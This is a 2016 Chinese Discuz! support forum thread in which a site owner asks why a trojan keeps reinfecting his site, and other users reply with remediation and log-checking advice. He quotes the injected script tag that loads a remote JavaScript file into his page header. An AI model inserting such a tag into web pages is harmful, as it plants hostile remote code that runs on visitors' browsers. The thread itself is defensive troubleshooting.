Discuz!官方免费开源建站系统

QQ登录

只需一步,快速开始

搜索

[求助] 为什么木马阴魂不散,我到底是哪里没有搞好?

汽车嘟嘟 发表于 2016-7-4 10:06:54 | 显示全部楼层 |阅读模式
无论网站怎么更新,设置,换密码,过不了几天又被人下木马了,请问我到底应该怎么解决呢?谁能帮帮我?

在网页的头被被人插入了代码:<!DOCTYPE html><script type="text/javascript" src="http://m.baiduyubaidu.com/2/a.js"></script>
jameson512 发表于 2016-7-4 10:15:22 | 显示全部楼层
卸载非应用中心安装的模板和插件,用官方默认 template和source文件夹覆盖下你网站根目录,然后使用官方默认模板

crx349 发表于 2016-7-4 10:28:09 | 显示全部楼层
做好服务器安全 哦

magentoon 发表于 2016-7-4 11:10:41 | 显示全部楼层
要重装一遍哪

米米米线 发表于 2016-7-5 19:32:03 | 显示全部楼层
不要听别人乱说。这种情况基本是你用了一个烂服务器或空间,被ARP攻击了。 和网站没有半毛钱关系,是网关出口被植入代码

vivafei 发表于 2016-7-5 19:56:22 | 显示全部楼层
arp攻击的可能性比较高

楼主| 汽车嘟嘟 发表于 2016-7-6 12:11:37 | 显示全部楼层
在本论坛为什么我无法指定回复帖子?验证码是个红×,不显示。

snowhack 发表于 2016-7-6 15:27:35 | 显示全部楼层
你可以先把你主页这个文件的写入权限设置一下,不给写入权,然后判断下还能否被挂。如果被挂了就说明是服务器或其他方面问题,如果没被挂就说明是你个人程序的事。

不要听别人瞎说,有些人不懂木马病毒这种事,以为重装就好使呢,别逗了。木马病毒是你以为重装一遍就能清理的吗?!真扯淡。

楼主| 汽车嘟嘟 发表于 2016-7-6 16:02:35 | 显示全部楼层
snowhack 发表于 2016-7-6 15:27
你可以先把你主页这个文件的写入权限设置一下,不给写入权,然后判断下还能否被挂。如果被挂了就说明是服务 ...

如果不给写入权限,很多功能都不正常了,我现在吧被改的文件不给写入权限,好像不会被黑,但是其他文件又能被改了,不知道是否传了隐蔽文件在服务器中

snowhack 发表于 2016-7-6 16:11:54 | 显示全部楼层
汽车嘟嘟 发表于 2016-7-6 16:02
如果不给写入权限,很多功能都不正常了,我现在吧被改的文件不给写入权限,好像不会被黑,但是其他文件又 ...

不正常是肯定啦,但这只不过是想把木马测出来嘛。又不是一直这样,你看看还有哪些文件被改了。然后看下时间和IP,然后你去查日志这个时段,这个IP都读去过哪些文件,这样你就能查到木马了。看日志的时候,如果你是国内空间,日志内写的时间和你当前时间会有8小时时差。